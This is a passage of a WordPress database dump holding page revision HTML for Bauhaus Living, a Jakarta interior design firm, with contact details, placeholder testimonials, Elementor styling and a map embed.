rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:30:05','2023-09-22 09:30:05','',22,'https://bauhaus.futuremediatrix.com/?p=4897',0,'revision','',0),(4899,3,'2023-09-22 09:44:21','2023-09-22 09:44:21','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:44:21','2023-09-22 09:44:21','',40,'https://bauhaus.futuremediatrix.com/?p=4899',0,'revision','',0),(4900,3,'2023-09-22 09:44:21','2023-09-22 09:44:21','<h3>contact us</h3>\n														<h2>\n								Feel free to get in touch with retirio							</h2>\n							<p> Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:44:21','2023-09-22 09:44:21','',40,'https://bauhaus.futuremediatrix.com/?p=4900',0,'revision','',0),(4901,3,'2023-09-22 09:44:21','2023-09-22 09:44:21','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:44:21','2023-09-22 09:44:21','',40,'https://bauhaus.futuremediatrix.com/?p=4901',0,'revision','',0),(4902,3,'2023-09-22 09:49:19','2023-09-22 09:49:19','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:49:19','2023-09-22 09:49:19','',40,'https://bauhaus.futuremediatrix.com/?p=4902',0,'revision','',0),(4903,3,'2023-09-22 09:49:19','2023-09-22 09:49:19','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:49:19','2023-09-22 09:49:19','',40,'https://bauhaus.futuremediatrix.com/?p=4903',0,'revision','',0),(4904,3,'2023-09-22 09:49:19','2023-09-22 09:49:19','<h3>contact us</h3>\n														<h2>\n								Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!							</h2>\n							<p> Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\n </p>\n							Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-22 09:49:19','2023-09-22 09:49:19','',40,'https://bauhaus.futuremediatrix.com/?p=4904',0,'revision','',0),(4905,3,'2023-09-22 09:52:23','2023-09-22 09:52:23','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Commercial						</h4>\n					0\n				    			        						<h4>\n							Residential						</h4>\n					0\n				    			        						<h4>\n							Office						</h4>','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 09:52:23','2023-09-22 09:52:23','',38,'https://bauhaus.futuremediatrix.com/?p=4905',0,'revision','',0),(4906,3,'2023-09-22 09:52:23','2023-09-22 09:52:23','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/file-1.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										